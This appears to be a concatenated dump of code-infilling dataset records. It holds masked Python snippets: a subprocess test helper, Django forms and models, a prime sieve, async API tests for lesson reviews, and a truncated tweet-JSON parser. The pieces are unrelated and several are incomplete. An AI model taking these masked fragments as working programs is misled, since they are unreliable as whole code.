thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\nwhich = memoize(which)\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-5": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport socket\nimport signal\nimport functools\nimport atexit\nimport tempfile\nfrom subprocess import Popen, PIPE, STDOUT\nfrom threading import Thread\nfrom queue import Queue, Empty\nfrom time import sleep\nimport json\nfrom .exceptions import CommandError, TimeoutWaitingFor\n\nON_POSIX = 'posix' in sys.builtin_module_names\n\n# Directory relative to basetest module location\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# Location of binary files (usually the src/ folder)\nBIN_PREFIX = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"..\", \"src\")\n)\n\n# Default location of test certificates\nDEFAULT_CERT_PATH = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"test_certs\")\n)\n\n# Default location of test extensions\nDEFAULT_EXTENSION_PATH = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"test_extensions\")\n)\n\n\n# Environment flags to control skipping of shared tests\nSHARED_SKIP = os.environ.get(\"SHARED_SKIP\", False)\n# Environment flags to control use of PATH or in-tree binaries\nSHARED_USE_PATH = os.environ.get(\"SHARED_USE_PATH\", False)\n\nUUID_REGEXP = (\"[0-9A-Fa-f]{8}-\" + (\"[0-9A-Fa-f]{4}-\" * 3) + \"[0-9A-Fa-f]{12}\")\n\n\ndef shared_binary_location(cmd=\"shared\"):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n # NOTE Increasing sleeptime can dramatically increase testsuite runtime\n # It also reduces CPU load significantly\n if timeout is None:\n timeout = 1\n\n if timeout < sleeptime:\n print(\"Warning, timeout cannot be smaller than\", sleeptime)\n timeout = sleeptime\n\n # Max number of attempts until giving up\n tries = int(timeout / sleeptime)\n\n for i in range(tries):\n val = cond()\n\n if val is not None:\n break\n\n sleep(sleeptime)\n\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n # Process is dead\n return True\n else:\n # Process is still ticking\n return None\n\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments[\"process\"]\n input = arguments[\"input\"]\n\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n # pid None is read by the main thread as a crash of the process\n pidq.put(None)\n\n outputq.put((\n \"\",\n (\"Unexpected exception caught during execution: '{0}' . \".format(e)),\n 255)) # false exitcode\n\n return\n\n # Put the PID in the queue for main process to know.\n pidq.put(proc.pid)\n\n # Send input and wait for finish\n out, err = proc.communicate(input)\n\n out, err = out.decode('utf-8'), err.decode('utf-8')\n\n # Give the output back to the caller\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n # Try to join the thread on failure abort\n thread.join(timeout)\n if thread.isAlive():\n # Join should have killed the thread. This is unexpected\n raise TimeoutWaitingFor(thread_error + \". Unexpected error\")\n\n # Thread died so we should have output\n try:\n # data = (stdout, stderr, exitcode)\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor(\"streams from program\")\n\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n # NOTE Increase this value if tests fail with None being received as\n # stdout/stderr instead of the expected content\n output_timeout = 0.1 # seconds\n\n pidq = Queue()\n outputq = Queue()\n\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n\n # Process crashed or timed out for some reason\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq,\n \"Program to start\")\n\n # Wait for process to finish (normal execution)\n state = wait_process(pid, timeout)\n\n if state:\n # Process finished\n return _retrieve_output(t, output_timeout, outputq,\n \"Program thread to join\")\n\n # If we reach this point we assume the process got stuck or timed out\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n # Start with lower signals and escalate if process ignores them\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n # 3 means the process finished/died between last check and now\n if e.errno != 3:\n raise\n\n # Wait for process to finish (should die/exit after signal)\n state = wait_process(pid, timeout)\n\n if state:\n # Process finished\n return _retrieve_output(t, output_timeout, outputq,\n \"Program to die\")\n\n # This should never happen but in case something goes really bad\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,\n merge_streams=False, env=os.environ, timeout=None):\n \"Run a subprocess and wait for it to finish\"\n\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n\n arguments = {\n \"process\": {\n \"args\": cmd,\n \"stdin\": stdin,\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"bufsize\": 1,\n \"close_fds\": ON_POSIX,\n \"env\": env,\n },\n \"input\": input,\n }\n out, err, exit = _get_output(arguments, timeout)\n\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n else:\n if exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\nfrom shutil import which\nwhich = memoize(which)\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip(\"\\n\")\n\n # Turn [] strings into {} to be treated properly as JSON hashes\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n\n if line.startswith(\"{\"):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n\n # Ensure removal at end of python session\n atexit.register(rmtemp, f.name)\n\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 0o755)\n\n return name\n\n# vim: ai sts=4 et sw=4\n",
"step-ids": [
7,
11,
13,
14,
16
]
}
|
[
7,
11,
13,
14,
16
] |
class DuplicatedBlockException(Exception):
code = 'duplicated_block_exception'
|
normal
|
{
"blob_id": "983e3b2902fe3bc701167da2f308fdaed612ae84",
"index": 1784,
"step-1": "<mask token>\n",
"step-2": "class DuplicatedBlockException(Exception):\n <mask token>\n",
"step-3": "class DuplicatedBlockException(Exception):\n code = 'duplicated_block_exception'\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from .models import AuthUser
class SignUpForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
email = forms.EmailField(widget=forms.EmailInput(attrs={'class':
'form-control'}))
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
first_name = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
last_name = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
class Meta:
model = AuthUser
fields = ('username', 'email', 'password1', 'password2',
'first_name', 'last_name')
class LoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
|
normal
|
{
"blob_id": "7644dcd956e1ad179f42e44870864386744c6cdf",
"index": 2553,
"step-1": "<mask token>\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-2": "<mask token>\n\n\nclass SignUpForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-3": "<mask token>\n\n\nclass SignUpForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n email = forms.EmailField(widget=forms.EmailInput(attrs={'class':\n 'form-control'}))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n first_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n last_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-4": "from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import AuthUser\n\n\nclass SignUpForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n email = forms.EmailField(widget=forms.EmailInput(attrs={'class':\n 'form-control'}))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n first_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n last_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
def sieve(limit):
numbers = list(range(3, limit, 2))
for prime in numbers:
for multiplier in reversed(range(2, limit)):
try:
numbers.remove(prime * multiplier)
except ValueError:
pass
return [2] + numbers
|
normal
|
{
"blob_id": "ec7ca03f627eaa635aac56e302b9c40bf0a3da38",
"index": 1796,
"step-1": "<mask token>\n",
"step-2": "def sieve(limit):\n numbers = list(range(3, limit, 2))\n for prime in numbers:\n for multiplier in reversed(range(2, limit)):\n try:\n numbers.remove(prime * multiplier)\n except ValueError:\n pass\n return [2] + numbers\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from django.db import models
class Professor(models.Model):
nome = models.CharField(max_length=100)
apelido = models.CharField(max_length=30)
descricao = models.TextField(max_length=1000)
def __str__(self):
return self.nome
class ImagemProfessor(models.Model):
professor = models.ForeignKey(Professor, on_delete=models.CASCADE)
foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)
|
normal
|
{
"blob_id": "acb879cb72e5b3ac897a271dc680e4ca763d2122",
"index": 7541,
"step-1": "<mask token>\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-2": "<mask token>\n\n\nclass Professor(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-3": "<mask token>\n\n\nclass Professor(models.Model):\n nome = models.CharField(max_length=100)\n apelido = models.CharField(max_length=30)\n descricao = models.TextField(max_length=1000)\n\n def __str__(self):\n return self.nome\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-4": "from django.db import models\n\n\nclass Professor(models.Model):\n nome = models.CharField(max_length=100)\n apelido = models.CharField(max_length=30)\n descricao = models.TextField(max_length=1000)\n\n def __str__(self):\n return self.nome\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-5": null,
"step-ids": [
2,
3,
5,
6
]
}
|
[
2,
3,
5,
6
] |
import datetime
from httpx import AsyncClient
from testing.conftest import (LESSONS_PATH, REVIEWS_PATH, pytestmark,
register_and_get_token)
class TestReview:
async def test_review_add_get(self, ac, fill_db):
# Creating users first
token = await register_and_get_token(ac)
token2 = await register_and_get_token(ac, main_user=False)
# Not providing ant lessons for review
for param in [{"lesson_id": []}, None]:
res = await ac.post(
REVIEWS_PATH, headers={"Authorization": f"Bearer {token}"}, params=param
)
assert res.status_code == 422, res.content
# Actually adding reviews
bad = [1488888, 8888888, 99999]
real = [1, 4, 8, 7]
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": bad + real},
)
assert res.status_code == 201, res.content
resulting_reviews = res.json()
# Getting each review separately and combining them
added = []
for review_id in real:
res = await ac.get(
REVIEWS_PATH + f"/{review_id}",
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
for item in res.json():
added.append(item)
# Trying to access the file using as a different user
# res = await ac.get(REVIEWS_PATH + f"/{review_id}",
# headers={"Authorization": f"Bearer {token2}"},
# )
# assert res.status_code == 403, res.content
# Trying to get a non-existent item
res = await ac.get(
REVIEWS_PATH + "/50000",
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 404
func = lambda x: x.get("lesson_id")
assert sorted(resulting_reviews["added"], key=func) == sorted(added, key=func)
assert resulting_reviews["already_added"] == []
assert sorted(resulting_reviews["non_existent"]) == sorted(bad)
# Adding duplicates
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": bad + real},
)
assert res.status_code == 201, res.content
resulting_reviews = res.json()
assert resulting_reviews["added"] == []
assert sorted(resulting_reviews["already_added"], key=func) == sorted(
added, key=func
)
assert sorted(resulting_reviews["non_existent"]) == sorted(bad)
async def test_getting_due_reviews(self, ac, mocker, fill_db):
# Creating a user first
token = await register_and_get_token(ac)
# Creating reviews for the user
to_add = [1, 4, 8, 7]
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": to_add},
)
assert res.status_code == 201, res.content
assert res.json()["added"] != []
assert res.json()["already_added"] == []
assert res.json()["non_existent"] == []
# Getting corresponding lessons
expected_lessons = []
for lesson_id in to_add:
res = await ac.get(LESSONS_PATH + f"/{lesson_id}")
assert res.status_code == 200
expected_lessons.append(res.json())
# Getting not yet ready reviews
res = await ac.get(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
assert res.json() == []
# Advancing time and getting ready reviews
class FakeDatetime:
def now(self=datetime.datetime):
return datetime.datetime(year=2100, month=1, day=1)
mocker.patch("app.routers.review.datetime", FakeDatetime)
res = await ac.get(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
func = lambda x: x.get("lesson_id")
#TOdo bring back
# assert sorted(res.json(), key=func) == sorted(expected_lessons, key=func)
# Todo check every review
# Reviewing each lesson
# Getting not yet ready reviews
# res = await ac.get(REVIEWS_PATH,
# headers={"Authorization": f"Bearer {token}"},
# )
# assert res.status_code == 200, res.content
# assert res.json() == []
|
normal
|
{
"blob_id": "3ec858c04a7622ae621bf322730b6b3ba9f4d07e",
"index": 5826,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestReview:\n\n async def test_review_add_get(self, ac, fill_db):\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n for param in [{'lesson_id': []}, None]:\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params=param)\n assert res.status_code == 422, res.content\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n added = []\n for review_id in real:\n res = await ac.get(REVIEWS_PATH + f'/{review_id}', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n res = await ac.get(REVIEWS_PATH + '/50000', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 404\n func = lambda x: x.get('lesson_id')\n assert sorted(resulting_reviews['added'], key=func) == sorted(added,\n key=func)\n assert resulting_reviews['already_added'] == []\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews['added'] == []\n assert sorted(resulting_reviews['already_added'], key=func) == sorted(\n added, key=func)\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n token = await register_and_get_token(ac)\n to_add = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': to_add})\n assert res.status_code == 201, res.content\n assert res.json()['added'] != []\n assert res.json()['already_added'] == []\n assert res.json()['non_existent'] == []\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f'/{lesson_id}')\n assert res.status_code == 200\n expected_lessons.append(res.json())\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n\n class FakeDatetime:\n\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n mocker.patch('app.routers.review.datetime', FakeDatetime)\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n func = lambda x: x.get('lesson_id')\n",
"step-3": "import datetime\nfrom httpx import AsyncClient\nfrom testing.conftest import LESSONS_PATH, REVIEWS_PATH, pytestmark, register_and_get_token\n\n\nclass TestReview:\n\n async def test_review_add_get(self, ac, fill_db):\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n for param in [{'lesson_id': []}, None]:\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params=param)\n assert res.status_code == 422, res.content\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n added = []\n for review_id in real:\n res = await ac.get(REVIEWS_PATH + f'/{review_id}', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n res = await ac.get(REVIEWS_PATH + '/50000', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 404\n func = lambda x: x.get('lesson_id')\n assert sorted(resulting_reviews['added'], key=func) == sorted(added,\n key=func)\n assert resulting_reviews['already_added'] == []\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews['added'] == []\n assert sorted(resulting_reviews['already_added'], key=func) == sorted(\n added, key=func)\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n token = await register_and_get_token(ac)\n to_add = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': to_add})\n assert res.status_code == 201, res.content\n assert res.json()['added'] != []\n assert res.json()['already_added'] == []\n assert res.json()['non_existent'] == []\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f'/{lesson_id}')\n assert res.status_code == 200\n expected_lessons.append(res.json())\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n\n class FakeDatetime:\n\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n mocker.patch('app.routers.review.datetime', FakeDatetime)\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n func = lambda x: x.get('lesson_id')\n",
"step-4": "import datetime\n\nfrom httpx import AsyncClient\n\nfrom testing.conftest import (LESSONS_PATH, REVIEWS_PATH, pytestmark,\n register_and_get_token)\n\n\nclass TestReview:\n async def test_review_add_get(self, ac, fill_db):\n\n # Creating users first\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n\n # Not providing ant lessons for review\n for param in [{\"lesson_id\": []}, None]:\n res = await ac.post(\n REVIEWS_PATH, headers={\"Authorization\": f\"Bearer {token}\"}, params=param\n )\n assert res.status_code == 422, res.content\n\n # Actually adding reviews\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": bad + real},\n )\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n\n # Getting each review separately and combining them\n added = []\n for review_id in real:\n res = await ac.get(\n REVIEWS_PATH + f\"/{review_id}\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n\n # Trying to access the file using as a different user\n # res = await ac.get(REVIEWS_PATH + f\"/{review_id}\",\n # headers={\"Authorization\": f\"Bearer {token2}\"},\n # )\n # assert res.status_code == 403, res.content\n\n # Trying to get a non-existent item\n res = await ac.get(\n REVIEWS_PATH + \"/50000\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 404\n\n func = lambda x: x.get(\"lesson_id\")\n assert sorted(resulting_reviews[\"added\"], key=func) == sorted(added, key=func)\n assert resulting_reviews[\"already_added\"] == []\n assert sorted(resulting_reviews[\"non_existent\"]) == sorted(bad)\n\n # Adding duplicates\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": bad + real},\n )\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews[\"added\"] == []\n assert sorted(resulting_reviews[\"already_added\"], key=func) == sorted(\n added, key=func\n )\n assert sorted(resulting_reviews[\"non_existent\"]) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n\n # Creating a user first\n token = await register_and_get_token(ac)\n\n # Creating reviews for the user\n to_add = [1, 4, 8, 7]\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": to_add},\n )\n assert res.status_code == 201, res.content\n assert res.json()[\"added\"] != []\n assert res.json()[\"already_added\"] == []\n assert res.json()[\"non_existent\"] == []\n\n # Getting corresponding lessons\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f\"/{lesson_id}\")\n assert res.status_code == 200\n expected_lessons.append(res.json())\n\n # Getting not yet ready reviews\n res = await ac.get(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n # Advancing time and getting ready reviews\n class FakeDatetime:\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n\n mocker.patch(\"app.routers.review.datetime\", FakeDatetime)\n res = await ac.get(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, res.content\n func = lambda x: x.get(\"lesson_id\")\n #TOdo bring back\n # assert sorted(res.json(), key=func) == sorted(expected_lessons, key=func)\n\n # Todo check every review\n # Reviewing each lesson\n\n # Getting not yet ready reviews\n # res = await ac.get(REVIEWS_PATH,\n # headers={\"Authorization\": f\"Bearer {token}\"},\n # )\n # assert res.status_code == 200, res.content\n # assert res.json() == []\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import json
import sys
from os import listdir
from os.path import isfile, join
import params
def encodeText(tweet_text):
tweet_text = tweet_text.replace('\n',' ')
return str(tweet_text)
def parse_file(file_in, file_out):
ptrFile_in = open(file_in, "r")
ptrFile_out = open(file_out, "w", encoding="utf-8")
cleanLines = []
for line in ptrFile_in:
cleanLine = {}
line = line.rstrip()
if line != "":
try:
decoded = json.loads(line)
cleanLine.update({"id" : decoded['id']})
cleanLine.update({"date" : decoded['created_at']})
if decoded.get('extended_tweet') is not None:
cleanLine.update({"text": encodeText(decoded['extended_tweet']['full_text'])})
else:
cleanLine.update({"text": encodeText(decoded['text'])})
cleanLine.update({"user_id" : decoded['user']['id']})
cleanLine.update({"user_name" : '@' + decoded['user']['screen_name']})
if decoded.get('place') is not None:
